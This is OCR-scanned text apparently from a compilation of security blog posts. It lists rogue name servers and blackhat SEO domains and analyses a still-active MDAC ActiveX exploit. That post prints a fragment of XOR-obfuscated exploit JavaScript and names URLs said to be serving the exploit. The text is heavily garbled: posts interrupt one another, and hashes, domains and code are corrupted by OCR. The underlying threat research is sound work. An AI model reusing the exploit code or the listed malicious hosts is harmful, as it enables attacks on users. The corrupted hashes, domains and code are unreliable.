robot _galaxy.png 
7ce19fd457645d300eebbc322b5c07a9 
robot _getright.png 
76d9fd540dba94c87845bce1066a4797 
robot _getsmart.png 
bd3651e7a0f1b5a546518de2708db4f0 
robot _girafa.png 
f5f47c4bde707fd9f34e93978dd07646 
robot _glucose.png 
2f3e166eb2ff8b9baa2b6415d4d3a5d7 
robot _goforit.png 
0dd769e6e671e6984f0401fddf26e5d1 
robot _goo.png 
40dbc2f7e4a480c93696a4b0b532d5f4 
robot _google.png 
a6db80d77c031a23df337f0684cb2485 
robot _gpost.png 
ca6e9f358c0a2d681bc0434888157add 
robot _grub.png 
d738c588f16b8f3519c7ce181fad2a57 
robot _harbot.png 
05977bfd36d3e81712dd809c84b14b7e 
robot hatena.png 
13976b5a6a6bc986ab23b977c8f4ed7d 
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robot _heritrix.png 
f687ba8e4d2fldcd702eble3ba8ebafd 
robot hoowwwer.png 
9a80f5345da852967d38d153ee5c3al10 
robot hotbot.png 
309bff6ce42d1d4c2a83e985d11b3d5a 
robot hotzonu.png 
343bdd0607be57e6d6cc88c759899fd4 
robot htdig.png 

9f6638b5a587 6afcc8bb58065c9c0e24 
robot html2jpg.png 
412bb274c038b130c77a9d92cba8851b 
robot hungary.png 
ea129096274f0dbc68a87del8f22c6b8 
robot _ilse.png 
cb226e1b742a2450cffaee2994517b39 
robot _iltrovatore.png 
b3c5564134e289eab0dd6fe40710b470 
robot _infoseek.png 
7aa6af3a421d63ac90325d1482a0cff4 
robot _inktomi.png 
d39e77fe03fbd691e156d7eb5c22234c 
robot _java.png 
€9c350b350480b480639140elba8e8ce 
robot jeteye.png 
e0b11cc3ec644ffd309b614bc5337d8b 
robot _jigsaw.png 
200f4935d69175cdaca46cl1fe2b5474e 
robot _jyxo.png 
8ea940b4418c54818be5d7048bdc3d49 
robot keywen.png 
c9fa1160c047e20983d5b53f4931d1fe 
robot _kinja.png 
5b11ad610936b3274338639b656881b97 
robot lapozz.png 
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9ffcO7b06bb27cc24f9e047d82276b57 
robot leechget.png 
189b04bdc24817499222339f1052d5b4 
robot _libwww.png 
0a45cf04d2d4a105f877140628e27b50 
robot _linkcheck.png 
8¢35030237bf607876b7dbaac66e74c3 
robot _linkman.png 
e725c6d8e4ce5eebd04684a90c2c101f 
robot _livedoor.png 
e164ff88e6ad5b6235175eed74f73382 
robot _livejournal.png 
30b0126f895d96c970eeeffcfd78a90a 
robot _look.png 
cbbef4a89a889802f1a36d71443c022f 
robot looksmart.png 
0811126ed7d3b7f23b5bac856f73d548 
robot loop.png 
a48fd50150c2b797eda31c8438241e05 
robot lycos.png 
0875a26e821ce16423c9eb070ede150e 
robot _matkurja.png 
ff895866ceefc9fdb2881c9027943ec4 
robot _mavicanet.png 
bdef836c0cf8e16049c2367cb0801a9b 
robot _metager.png 
eae38d1440c33fe802f86e4acb28bcda 
robot metamedic.png 
5d22948e4794feb09e39d1aal48175d8 
robot _mirago.png 
829740468181789fc69e3b54df37311b 
robot _mj12.png 
€112f35539ba07720cb50aa69288867e 
robot _movabletype.png 
dafa5e5ef6537b38371b048646aab0f7 
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robot _mozdex.png 
cafaeadb5d2475c6e5050861f1353db4 
robot _msn.png 
2fca38b2050cla7aac15bcaddf7a75a0 
robot nameprotect.png 
Ofdb8b7033b47c451586e8e0d0195901 
robot _naverbot.png 
9664174e6d4dad5fcd754d3fc9645b09 
robot _nessus.png 
0d4b05a4c92c1lbe27a2eef5c3d74b913 
robot _netants.png 
5ff9a06903fa88011803458e4c4a84a7 
robot _netcraft.png 
7979dd54d6274173bedd97cd524db36c 
robot _netmechanic.png 
5d641d23d78c98ad3aace9d35f8033b2 
robot netnewswire.png 
31313c04f70788bd093cfe7070f3a1b8 
robot _netnose.png 
b4d203bec872c21f0ec836bf00071c64 
robot _newsfire.png 
46e5fcfb80563d1ebc584c7450686c10 
robot _newsgator.png 
5998f3c46d1f68913eb7 be4bfb696d6f 
robot _newzcrawler.png 
2fd7d1f6341410b1224aaafl62539e58 
robot _noviforum.png 
bdfa2ac2daacbb5024b641d8a8fe00ce 
robot omea.png 
dla5bdc97bed73a0495905763618adce 
robot _onet.png 
Oddd123e6527dff85b93d437b49c9fe5 
robot _openfind.png 
3ebc5c5932e7e675452895ec0a4c5cef 
robot _overture.png 
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b7904c931dfalb576cc5d75259c455d9 
robot _peerbot.png 
39492daec9b60c5b338ed042b39aaa4f 
robot _php.png 
€0338f273e6539943fc44eb704937347 
robot _pinseri.png 
f306970bea9b0553de8a981125f85d00 
robot _planet.png 
09744386518ef787fce11608434d0996 
robot _plsearch.png 
ac3367ceec4e5196ed8cb99F7 79cef04 
robot _pogodak.png 
5a52117d684994ea3870a7154c950426 
robot pompos.png 
e€790722c4b4f17368aaeb302fd477bc9 
robot _pukiwiki.png 
81a1ca609618eb4f18b5c5eff07188bd 
robot _quepasa.png 
3d65fdc5a568022626b0287383498097 
robot _rambler.png 
cbaObdf4c451fa0ff25a5cOdc5cbe55b 
robot _robot.png 
€914c0fd3d0423692b0fec5b55bf7 7f8 
robot _rssbandit.png 
85d8flab4df6cbcadd5055d350ff90da 
robot _rssowl.png 
04a9970af53f7fe25efc4061b076682f 
robot saucereader.png 
7506c7e1b2f9a6ac5f37b8a03f671376 
robot _scrubby.png 
eb5fe8b4319d1a777ea4c1727c839941 
robot seekport.png 
8e0682302140826c67e39fcc87ccIaf0 
robot _sharpreader.png 
bec3dc74eed828db0653025b176ca2b1 
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robot _simpy.png 
1d06310b351d861302b7c1508fa0ecd6 
robot _singingfish.png 
aceac5f738f209956764891a8b7a0569 
robot _sitebar.png 
6ae8fbc306d819d8f2fd1b9373254149 
robot soft411.png 
89aadd6c3420a47cb084c98beal50822 
robot _stardownloader.png 
949ceb4de5be9e393b149bdfd563dal12 
robot superbot.png 
035197842acc5f661lebeeb6853668ceb 
robot _szukacz.png 
c3ae6937187742dcc3a7eda62348e16d 
robot _technorati.png 
12206b797264b3afb1142c315a6296f1 
robot teleport.png 
cd7c418211cda25370cff4d2660ea8d9 
robot teoma.png 
4a6b8bae47c8ba5be30bd21leae521a12 
robot thunderstone.png 
b23c0f47aa73b2fb0267e491ce4f5 74f 
robot _turnitin.png 
25b912d79aec81d33fedf7f36ee7b368 
robot _typepad.png 
6f47b32297cbc674867f5f7 7805cf948 
robot _validator.png 
€2311380dde9f402072100688a680316 
robot _vindex.png 
94f2f17decd7c2dd4f7bb162a9052308 
robot _voila.png 
80caa62a241751leec84e5a6e0bel2d7f 
robot _waypath.png 
f62ce7d5055d6a845de63f49010d1737 
robot _webcopier.png 
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155dd3b6ad3580e491991440441f174b 
robot webmin.png 
a24702bf13bb129c89cf38d6846f082a 
robot webmon.png 
b48b45cc875b84772e31ac50abbdb734 
robot _webpix.png 
7ba54a08f901d175f919e64baf8caf80 
robot _websquash.png 
14b0ca78f6dfe3290173999a8baac695 
robot _webzip.png 
3ddfab4bc3d6346e98b045d99f605551 
robot wget.png 
b0421bb7e01bbe4755671c15ac63698a 
robot _wiseguys.png 
868096efb1715482fd5f544ac64a6832 
robot _wordpress.png 
4248e45b64381783228cc6041419ad2d 
robot _worldlight.png 
4f961487ab5c2184dc88da2abb7 75680 
robot _wotbox.png 
8797b34f58f590f8cf7ecada7678186a 
robot _wp.png 
ff3b8304e0022af24cab8974ad653bcc 
robot wwgrapevine.png 
88272288baa7a8976b5fc51dfc1d33b2 
robot _wwwc.png 
43713bbc4c9f0092173fc705e4af763c 
robot wwweasel.png 
b38c7367e608a325590823567643d38b 
robot _wysigot.png 
7778188428b95c65060d46aa0d867ae8 
robot _yahoo.png 
b3f4dbc1282bc9b7a8082a1e7186e756 
robot _yandex.png 
cOff33976791463c92c9c863abc56ea7 
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robot _yell.png 
f7f8f637505a8c640e039054cb55e3a0 
robot _zeal.png 
064823f1a739507d8179d592b3ca90b3 
robot _zyborg.png 
411f41b6603b58b90a48ebb7a5250fe4 
S_adaware.jpg 
7fd27a17a04f731f36b14a265f33162a 
S_arovax.jpg 
c5144f54ccdlec65bb36de336b83aba8 
S_avg.jpg 
3b9e99c9a76447a608f5290c620a67ad 
S_mcafee.jpg 
b818a83a85cfab3fcblala75728b5b10 
Ss _microsoft.jpg 
b2bee3f35d77fd305e16411c4dc46796 
S_pestpatrol.jpg 
d829f2033d5df6c08745blecb4e76b47 
S_spysweeper.jpg 
f2b680dd9e1a69461f15c445a19c800d 
S _spywarebegone.jpg 
ff300b10d8f927b79989efae87laf4ee 
S_spywareblaster.jpg 
e2ebf8d738c8d8769716ec3bdc4a95a3 
S_spywaredoctor.jpg 
19ba1b44a38294174cdb1d102e05c094 
valid-css.png 
543fb65609e1a85b2a570cded2a4b3ab 
valid-xhtml10.png 
35d68960eb0c0c57610f476737c5d3b7 
vb.jpg 
a92f633561lee0e2d0e7be52c7ac0680c 
vb.png 
4c7ed2a3b2cf52ba62b54b31ca13900c 
Stay tuned! 


1. https://1.bp.blogspot .com/-ef ju4IdHwio/X9SS- XQMrGI/AAAAAAAALPw/x4pW4bJLzZOY-hiyARv-yyOEJEwOsPqdsACLcBGAsYHQ 
s400/Misc_822. jpg 


2. https: //ddanchev.blogspot .com/2020/12/exposing-modern-client-side-exploits_46.htm 
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16.10.27 Exposing a Diverse Portfolio of Malicious and Fraudulent Name Servers - 
An Analysis (2020-12-12 14:22) 


[1] 


“3 Google Webmaster Tools - Message view - Mozilla Firefox 


File Edit ‘Yiew History Bookmarks Tools Help 


July 16, 2007 
Dear site owner or webmaster of www.example.com, 


While we were indexing your webpages, we detected that some of your pages were using 
techniques that were outside our quality guidelines, which can be found here: 
http: /Awww. google. comAvebmasters/quidelines. html 


In order to preserve the quality of our search engine, we have temporarily removed some webpages 
fromm our search results. Currently pages from www.example.com are scheduled to be rernoved for at 
least 30 days. 


Specifically, we detected hidden text on www.example.com. 


We would prefer to have your pages in Google's index. If you wish to be reincluded, please correct or 
remove all pages that are outside our quality guidelines. When you are ready, please visit: 


https:/Awww. google. com/webmasters/tools/reinclusion?hl-en 
to learn more and request a reinclusion request. 
Sincerely, 


Google Search Quality Team 


« Back to the message center Delete Forever Mark as Unread 
v 


Done Jiiiihttp://expert-seotips blogspot.comi/iifi/ii 


Dear blog readers, 


In this post I’ve decided to share a diverse portfolio of fraudulent and malicious name servers 
circa 2008 that are known to have participated in various rogue and malicious software serving 
campaigns. 


Sample portfolio of rogue fraudulent and malicious name servers known to have participated 
in rogue and malicious campaigns circa 2008: 


nsO.adesuikintandefunhandesun.com 
nsO.ahfywbz.com 
nsO.bcrqhro.com 
nsO.ckjdtybz.com 
nsO.cnogaira.com 
ns0O.fyukbz.com 
nsO.kerunhandgunfandesikuntun.com 
nsO.rehogonro.com 
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nsO.uthvfybz.com 
nsO.wkakekod.com 
ns1.52352a0c60a9c29.com 
ns1.6309a46.com 
ns1.adns2008.com 
ns1.b546ec5a89.com 
ns1.bestairusa.com 
ns1.betotallyclear.com 
ns1l.callcityusa.com 
ns1.chongdns99.com 
nsl1.devinavy.com 
ns1.dnsreal.com 
ns1.docdns2008.com 
ns1.fatiloguent.com 
ns1.fuscadns.com 
ns1.holdsurface.com 
nsl.img111dns.com 
ns1.kozel-soft.com 
ns1.krdns555.com 
ns1.laga-soft.com 
ns1.liabilityzul.com 
ns1.metdns101.com 
ns1.metdns99.com 
nsl.mgrsu.com 
ns1l.mycandydns.com 
ns1.mywowdns.com 
ns1.ns-martian.com 
ns1.osel-soft.com 
ns1.penunmaimed.com 
ns1.piradns.com 
ns1.poertodas.com 
ns1.rokodns2008.com 
nsl1.serbicephalous.com 
ns1.sobaka-soft.com 


nsl1.stardecagon.com 
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3.12 December 


3.12.1 Censoring Web 2.0 - The Access Denied Map (2007-12-03 17:23) 


GV Advocacy is an anti-censorshep project of Globe! Vorces ontine, learn more. 


Home Ahewt Archives Comtact Tools & Guides wee UntWtered Advex Gallery The Map 


Web2.0</? 


HPs People vanantng 


OW Advocacy as a project of Global Veices | Suppeeted by | Licerssed Creatrve Commons, details 


Remember the [1]World’s Internet Censorship Map? This is [2]a niche version of it that’s 
"mapping the online censorship and anti-censorship efforts related to the Web 2.0". Com- 
pared to, for instance, [3]lrrepressible, whose idea is to take advantage of the long-tail of 
anti-censorship by allowing everyone to embedd a badge that’s spreading censored content, 
the Global Voices Advocacy "seeks to build a global anti-censorship network of bloggers and 
online activists dedicated to protecting freedom of expression and free access to information 
online." and aims to act as a vehicle to communicate the censored information to the rest of 
the world, a far more pragmatic approach than having the censored bloggers figure out how 
to post the facts online - they’ll simply forward them to the GVA. 


And just as important it is to take advantage of the wisdom of crowds, whose [4]collec- 
tive intelligence can in fact act as an early warning system, it’s also important to [5]educate 
those who cannot freely express their opinion on the process of expressing it 


1. http: //ddanchev. blogspot .com/2006/06/worlds- internet-censorship-map. htm 
2. http: //advocacy.globalvoicesonline.org/maps/ 

3. http://irrepressible. info/ 
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nsl.stookvol.com 


ns2.52352a0c60a9c29.com 


ns2.6309a46.com 
ns2.adns2008.com 
ns2.b546ec5a89.com 
ns2.bestairusa.com 
ns2.betotallyclear.com 
ns2.caccytoo.com 
ns2.callcityusa.com 
ns2.chongdns102.com 
ns2.chongdns99.com 
ns2.dnsreal.com 
ns2.docdns2008.com 
ns2.fatiloquent.com 
ns2.freesecondaryns.com 
ns2.fuscadns.com 
ns2.holdsurface.com 
ns2.img1l11dns.com 
ns2.jaeb6mee.com 
ns2.kaihooho.com 
ns2.kninuti.com 
ns2.kozel-soft.com 
ns2.krdns555.com 
ns2.laga-soft.com 
ns2.metdns101.com 
ns2.metdns2008.com 
ns2.mgrsu.com 
ns2.mycandydns.com 
ns2.mywowdns.com 
ns2.ns-martian.com 
ns2.palmyxer.com 
ns2.piradns.com 
ns2.rokodns2008.com 
ns2.sobaka-soft.com 


ns2.stookvol.com 
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ns2.tantrarure.com 
ns3.52352a0c60a9c29.com 
ns3.6309a46.com 
ns3.b546ec5a89.com 
ns3.kninuti.com 
ns3.metdns101.com 
ns3.metdns2008.com 
ns3.metdns99.com 
ns3.mycandydns.com 
ns4.52352a0c60a9c29.com 
ns4.b546ec5a89.com 
ns4.kninuti.com 
ns4.metdns101.com 
ns4.metdns2008.com 
ns4.metdns99.com 
ns5.b546ec5a89.com 
ns5.mycandydns.com 
ns5.mywowdns.com 
ns6.mywowdns.com 
ns7.mywowdns.com 
ns5.icegifted.com 
ns6.icegifted.com 
ns3.maxigreat.com 
ns4.maxigreat.com 
nsl.savetangy.com 
ns2.savetangy.com 
al.aromalucky.com 
al.aromasheer.com 
al.base-dns.com 
al.buyzest.com 
al.chicprize.com 
al.movercoy.com 
al.newfull.com 
al.treatzap.com 


b2.alerttan.com 
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b2.aromalucky.com 
b2.buyzest.com 
b2.chicprize.com 
b2.eageraware.com 
b2.newfull.com 
b2.peakchic.com 
b2.spicyeager.com 
b2.treatzap.com 
c3.alerttan.com 
c3.aromalucky.com 
c3.awarewise.com 
c3.buyzest.com 
c3.modelenjoy.com 
c3.spicyeager.com 
c3.whizfab.com 
d4.aromalucky.com 
d4.newfull.com 
d4.treatzap.com 


dnsl.advocacylife.com 


dns1.believingunsurpassed.com 


dnsl.carryslip.com 
dnsl.colonysing.com 
dnsl.considerfeet.com 
dnsl.coolcontain.com 
dns1.courageslave.com 
dnsil.directwit.com 
dns1.feltverb.com 
dns1.fingersame.com 
dnsl.fivebuild.com 
dnsi1.hurrystring.com 
dns1l.instrumentinvent.com 
dnsl.legacyice.com 
dns1.moleculetrain.com 
dns1.namenear.com 


dnsl.ohpush.com 
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dnsl.operatedefinition.com 
dns1.otherinstrument.com 
dns1.positionbusy.com 
dns1.probableout.com 
dns1.quickbefore.com 
dns1.rowknow.com 
dns1.shinefull.com 
dns1.spendlift.com 
dnsl.substancelost.com 
dnsl.suddenyet.com 
dns1.tenaciousscores.com 
dns1.tenbusy.com 
dnsi1.therereflection.com 
dns1.thickcondition.com 
dns1.thishe.com 
dns1.triangleelse.com 
dns1.vowelsimple.com 
dns1.washfar.com 
dns12.repentantdetached.com 
dns2.advocacylife.com 
dns2.appreciationseed.com 
dns2.arespoke.com 
dns2.considerfeet.com 
dns2.coolcontain.com 
dns2.courageslave.com 
dns2.directwit.com 
dns2.feltverb.com 
dns2.fivebuild.com 
dns2.foodwhy.com 
dns2.headarrange.com 
dns2.heardrest.com 
dns2.hurrystring.com 
dns2.instrumentinvent.com 
dns2.ohpush.com 
dns2.operatedefinition.com 
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dns2.operatelet.com 
dns2.optimismdance.com 
dns2.otherinstrument.com 
dns2.positionbusy.com 
dns2.quickbefore.com 
dns2.shinefull.com 
dns2.spendlift.com 
dns2.substancelost.com 
dns2.suddenyet.com 
dns2.tenaciousscores.com 
dns2.triangleelse.com 
dns2.verycome.com 
dns2.waitspirituality.com 
dns2.whoachievement.com 
dns2.windevery.com 
dns21.aglowgreat.com 
dns21.fearlesshelp.com 
pt3.maxiultra.com 
ptl.agreeextra.com 
ns5.icegifted.com 
ns3.prizekind.com 
ns3.tansure.com 
ns3.loftysure.com 
pt3.piouswarm.com 
ns3.greatwarm.com 
ns3.primesheer.com 
ns5.rollsheer.com 
pt5.fossdns.com 
pt5.upssdns.com 
pt3.loyalbeats.com 
ns3.maxigreat.com 
pt3.adoresweet.com 
pt3.eagersweet.com 
ns3.spicyrest.com 


ns3.kindhardy.com 
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ns3.lovetangy.com 
pt3.tangytangy.com 
63q00.speedultra.com 
m3h20.speedultra.com 
mvt20.speedultra.com 
lyg50.speedultra.com 
txq60.speedultra.com 
atrb0O.speedultra.com 
IptbO0.speedultra.com 
eepcO.speedultra.com 
sqwcO.speedultra.com 
yOod0.speedultra.com 
jzrf0.speedultra.com 
aavf0.speedultra.com 
zgcg0.speedultra.com 
vwxg0.speedultra.com 
xwal0.speedultra.com 
m01m0.speedultra.com 
711m0.speedultra.com 
xpbm0.speedultra.com 
rpqp0.speedultra.com 
umkq0.speedultra.com 
vvzs0O.speedultra.com 
fyzsO.speedultra.com 
tkjtO.speedultra.com 
xkdu0.speedultra.com 
ac4x0.speedultra.com 
tchy0O.speedultra.com 
qxbz0.speedultra.com 
twm21.speedultra.com 
xqh61.speedultra.com 
glal.speedultra.com 
dmzal.speedultra.com 
4pqb1.speedultra.com 
iumd1.speedultra.com 
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ni2g1.speedultra.com 
jdxil.speedultra.com 
w81j1.speedultra.com 
4hwm1.speedultra.com 
7rnql1.speedultra.com 
nskr1.speedultra.com 
Oltul.speedultra.com 
gmyy1.speedultra.com 
A4tiz1.speedultra.com 
cuf42.speedultra.com 
gtn92.speedultra.com 
difa2.speedultra.com 
mo2f2.speedultra.com 
psgf2.speedultra.com 
svvh2.speedultra.com 
pfjk2.speedultra.com 
oiwk2.speedultra.com 
guds2.speedultra.com 
ybwv2.speedultra.com 
opvw2.speedultra.com 
ryvw2.speedultra.com 
ixoy2.speedultra.com 
kzz2.speedultra.com 
7a083.speedultra.com 
Orz83.speedultra.com 
es93.speedultra.com 
zpta3.speedultra.com 
sygb3.speedultra.com 
2ezc3.speedultra.com 
zwqh3.speedultra.com 
m3ym3.speedultra.com 
ccwo3.speedultra.com 
zdgp3.speedultra.com 
Opqs3.speedultra.com 


dg5v3.speedultra.com 
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058x3.speedultra.com 
pyx3.speedultra.com 
vpp84.speedultra.com 
wcxb4.speedultra.com 
z7li4.speedultra.com 
hwfm4.speedultra.com 
wocr4.speedultra.com 
zwjr4.speedultra.com 
9fcx4.speedultra.com 
bnox4.speedultra.com 
snw15.speedultra.com 
wgg35.speedultra.com 
j6yf5.speedultra.com 
xqig5.speedultra.com 
cqh5.speedultra.com 
sukk5.speedultra.com 
9iml5.speedultra.com 
2tq5.speedultra.com 
tmnr5.speedultra.com 
nxgs5.speedultra.com 
yhft5.speedultra.com 
r4uv5.speedultra.com 
vw5.speedultra.com 
kvo06.speedultra.com 
wey36.speedultra.com 
wn456.speedultra.com 
\j186.speedultra.com 
1ta6.speedultra.com 
jqwa6.speedultra.com 
caid6.speedultra.com 
zh4e6.speedultra.com 
ptlg6.speedultra.com 
cOfg6.speedultra.com 
764n6.speedultra.com 


fhen6.speedultra.com 
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imos6.speedultra.com 
seu6.speedultra.com 
nezu6.speedultra.com 
6m5w6.speedultra.com 
j3jw6.speedultra.com 
p7fy6.speedultra.com 
eksO7.speedultra.com 
dyil7.speedultra.com 
rqra7.speedultra.com 
241b7.speedultra.com 
i5me7.speedultra.com 
1rcj7.speedultra.com 
z0dm7.speedultra.com 
vom7.speedultra.com 
oilq7.speedultra.com 
yhrt7.speedultra.com 
hwxu7.speedultra.com 
epuv7.speedultra.com 
t27w7.speedultra.com 
Otby7.speedultra.com 
yuj18.speedultra.com 
ifj28.speedultra.com 
xh368.speedultra.com 
4nt78.speedultra.com 
kj2e8.speedultra.com 
zoe8.speedultra.com 
ji3f8.speedultra.com 
sm0n8.speedultra.com 
yowqg8.speedultra.com 
8fzq8.speedultra.com 
rOcu8.speedultra.com 
ho2w8.speedultra.com 
irlz8.speedultra.com 
dvt09.speedultra.com 


qgh19.speedultra.com 
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5ez19.speedultra.com 
hto89.speedultra.com 
qay89.speedultra.com 
cOua9.speedultra.com 
nwab9.speedultra.com 
oqb9.speedultra.com 
wu8c9.speedultra.com 
fimd9.speedultra.com 
cfte9.speedultra.com 
shrf9.speedultra.com 
Andi9.speedultra.com 
dakj9.speedultra.com 
azlj9.speedultra.com 
a4fk9.speedultra.com 
logk9.speedultra.com 
j2hv9.speedultra.com 
42tx9.speedultra.com 
2cg0a.speedultra.com 
8qvaa.speedultra.com 
uljba.speedultra.com 
k46da.speedultra.com 
tjcea.speedultra.com 
bqiea.speedultra.com 
vwhfa.speedultra.com 
fq9ga.speedultra.com 
rksga.speedultra.com 
nkdha.speedultra.com 
h8o0ia.speedultra.com 
skka.speedultra.com 
lorla.speedultra.com 
wzcna.speedultra.com 
t4dna.speedultra.com 
6uvna.speedultra.com 
mb4oa.speedultra.com 


jhyoa.speedultra.com 
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4. http://ddanchev. blogspot .com/2006/11/global-map- of-security-incidents-and.htm 


5. http: //ddanchev. blogspot . com/2007/10/everyones-guide-to-by-passing- internet .htm 


3.12.2 MDAC ActiveX Code Execution Exploit Still in the Wild (2007-12-05 18:50) 


<Seript Language="JavaScript’> function xor_str(plain_str, xor_key){ var xored_str = “"; 
for (var i = 6 ; i < plain_str.length; ++i) xored str += String.fromCharCode(xor_ke 


plain _str.charCodeAt(i)); return xored_str; } (RT StI MDE i ee ee Shere ae 
jaspersky2(suck_dick.2gain eet ai erie 

“\x8O\xad\xaa\xad\xaa\xd6\xc1\xd2\x88\xcd\xcd\ x8 O\x9d\ x8 B\ xce\xcS\xd7\x8O\xet\xd2\xd2\xc1\xd 
\x89\x9b\xad\xaa\xd6é\xc1\xd2\x8 8\xcd\xcS\xcd\xFF\xcé\xcc\xc1\xc7\x8O8\x9d\ x8 O\x9 O\x9b\xad\xaa 
xaa\xc6\xdS\xce\xc3\xd4s\xc9\xcf\xce\x88\xc8\x88\x89\ x8 B\xdb\xcd\xcd\x9d\xcd\xcd\x9b\ x8 B\xd3\ 
G4&\xFa\xc9\xcd\xcS\xcf\xd5\xd4\x88\x82\xc8\x88\x89\x82\x8c\ x8 O\x92\ xP O\ x9 B\ x9 B\xB9\x9b\xdd\x 
a\xad\xaa\xc6\xd5\xce\xc3\xd4\xc9\xcf\xce\x8 6\xc7\xc5\xd4\xc2\x88\xc2\x8c\x8B\xc2\xF3\xc9\xd 
\x89\xad\xaa\xdb\xd7\xc8\xc9\xcc\xc5\x88\x88\xc2\x8e\xcc\xc5\xce\xc7\xd4\xcB\xBa\x92\x9c\xc2 
xc9\xda\xcS\x89\xdb\xc2\x8 O\x8b\x9d\ x8 B\xc2\x9b\ xdd\xad\xaa\xc2\ x8 O\x9d\ x8 O\xc2\xBe\xd3\xd5\ 
d3\xd4\xd2\xc9\xce\xc7\x88\x9 OY x8c\xc2\xF3\xc9\xda\xc5\x8F\x92\x89\x9b\xd2\xc5\xds\xd5\xd2\x 
O\xc2\x9b\xdd\xad\xaa\xad\xaa\xc6\xd5\xce\xc3\xds\xc9\xcf\ xce\ x8 O\ xc3\xc6\x88\x89\xad\xaa\xd 
\xC1\Xd2\x8 BY xda\xc3\x8 BY x9d\ x8 BY x9 B\xXd8\ x9 BY XC4\x9 BY Xc4\ x9 O\xXc4\ x9 O\xc4\x9d\xad\xaa\xd6\xct 
x8 O\xXCT\xX8S O\xX9d\ x8 B\xd5\xce\xcS\xd3\xc3\xctT\xdO\xcS\x88\x82\x85\xd5S\ x94 x93 \xOu\ x93\xB5\xd5\ 
O3\x9OUAKOS\ KES KGS x9 BL xc6\xcS\xc2\x85\xdS\x93\ x93, x95 \xc2\x85\xdS\ x96 \x96\xc3\x99\x85\xd5\x 
B\XC2\X99\KBS\xdS\x98\ x9 OY x9 B\xX91\ x85 \xdS\xcS\xc6\x93\x93\x82\ x8 O\x8b\xad\xaa\x82\x85\xd5\xe 
\x94\x93\x85\xd5\xcS\xc2\xc6\xc1\x85\xd5\xcS\x98\ x9 B\x95\x85\xd5\xc6\xc6\xcS\xc3\x85\xd5\xc6 
xc6\xc6\x85\xd5S\x98\xc2\x97\xc6\x85\xd5\xc4\xc6\xOe\xc5\x85\xd5\xcS\xcé\xcS\xc6\x85\xd5\x96\ 
cS\xc6\x85\xd5\xc5\x93\xc1\xc6\x85\xd5\x99\xc6\x96\x94\ x85 \xd5\ x94 x92\xc6\x93\xB5\xd5\x99\x 
6\x94\x85\xd5\x96\xc5\xc5\x97\x85\xd5\xc5\xc6\x9 O\x93\x85\xd5\xc5\xc6\xcS\xc2\x82\x8O\x8b\xa 
\xB82\x85\xd5\x96\x94\xcS\xc6\x85\xd5\xc2\x99\ x9 BY x93\ x85 \ xd5\x96\x91\x9B\x97\xB5\xd5\xc5\x91 
x91\x85\xd5\x9 O\x97\x9 B\xX93\ x85 \xd5\xcS\xc6\x91\x91\x85\xd5\xc5\xc6\xc5\xc6\x85\xd5\xe1\xc1\ 
D6\XB5\xd5\xc2\x99\xcS\xc2\x85\ xd5\x97\x97\x9B\ x97 \xB5\xd5\ x96 \xIS\xOT\ x91 \ xB5\xd5\x9B\x97\x 
TNXBS\XdS\XCS\XCH\X9OT\xXC6\xX85\ xd5\xcS\xc6\xcS\xc6\x85\xd5\xct\xct\x96\x96\xB5\xd5\xc2\x99\xc 
\XS2\x8O\x8D\xad\xaa\x82\x85\xd5\xc3\xXct\x9B8\x97\x85\ xd5\ x91 \ x9 BV x9S\xXCO\XBS\ KGS \ x9 BY X97 \ x92 
XSS\XUS\XCSVXCOLKO BY XCH\XB5\ xXd5\ XCS\XCOLXCSLXCO\KBES\ KOS \XCTLXCTV\X9O\X9GLKBS LL xd5S\xc2\x99\ xcs) 
SS\XdS\ XI O\XO OL KOB\XO7\ X85 \xd5\ x9 B\ xcO\x92\xOTV\xB5\xd5\ x9 O\ x97 \x9B\xc6\xB5\xdS\xcS\xc6\x93\x 
SA\XGS\xXCS\XCO\KCSAXCO\KB5\xd5\xXcT\xXcT\x96\x96\ x85 xd5\xc2\x99\ xc6\xc6\x85\xdS\x92\xcS\ x98 xo 
\xd5\x9O\xct\x99\x96\x82\x8 O\x8D\xad\xaa\x82\xB5\xdS\ x9 BV x97 \ x95 \ x97 \ x85 \xdS\xcS xc6\x92\ x99 
xd5\xcS\xc6\xcS\xc6\x85\xd5\xci\xct\x96\x96\x85\xd5\xc1\xc6\xcé6\xc2\x85\xdS\xcu\xO7\x96\xcb\ 
dS\x99\xc1\x92\xc3\x85\xd5\x96\x96\x91\ x95 \ x85 \xd5\xc6\x97\xc1\xc1\x85\xdS\xcS\x98\x9 B\x96\x 


Who needs zero day vulnerabilities when the average end user is still living in the perimeter 
defense world and believes that security means having a firewall and an anti virus software 
running only? Now that’s of course a rhetoric question given how [1]modern malware is either 
blocking the update process of these applications, or shutting them down almost by default 
these days. 


The following URLs are currently active and exploiting [2]CVE-2006-0003, and despite 
that it was patched in 11 April, 2006, the last quarter of 2007 showcased the malware authors 
simplistic assumption that outdated but unpatched vulnerabilities can be just as effective 
as zero day ones, and when the assumption proved to be true - take Storm Worm’s use of 
outdated vulnerabilities as the best and most effective example - it automatically [3]lowered 
the entry barriers into the world of malware, breaking through the myth that it’s zero day vul- 
nerabilities acting as they key success factors for a malware embedded attack on a large scale: 


dgst.cgs.gov.cn/docc/index.htm 
dhyjagri.gov.cn/program/images/img/New/index.htm 
sell.c2bsales.com/look.htm 
nesoy.com/svcdir/index.htm 
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vbzra.speedultra.com 


yO1sa.speedultra.com 


Ougsa.speedultra.com 


uxmsa.speedultra.com 


Ovita.speedultra.com 


ptpta.speedultra.com 


bg5ua.speedultra.com 


tfhva.speedultra.com 


miva.speedultra.com 


yaixa.speedultra.com 


vkxa.speedultra.com 


Stay tuned! 


1. https://1.bp.blogspot.com/-BTmcvN7uhvg/X9ShmPQ5YUI / AAAAAAAALQA/p95vHaZv5KoaEHmLwAZdhvui 2GOPQm20wCLcBGAsYHQ 
s636/Misc_824.JP 
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16.10.28 Exposing a Massive and Diverse Portfolio of "Tax Forms" Themed Malware 
and Blackhat SEO Serving Domains (2020-12-12 14:22) 


¥ XRumer 12.0.1 Elite [ Standart J, Copyright BotmasterLabs.net, Support ICQ 111892 ae8ea 
Project Tool Options Eventslog ‘Scheduler Selftearning Plugins Modifications Help 
(> i z) w L : Current project MyProject | eave x 


SUccesstul P. P Proftes Activation 


3 — 9 —_o____o___}______s___»___].____.._____ 
) Database of inks: te_links, txt 2 a 2 | 


| i] Anonymity Email activation Mukthreading 


OFF Number of threads 
@) AUTO © CPU loading: 


Network load: 


Posting coritrot active theeads 0 


Current position 0 


Start Resume from the last position > © Stop 
Posting ¥ Test 
Nt | Progress Link Status 
Authorization completed successfully. 


Dear blog readers, 


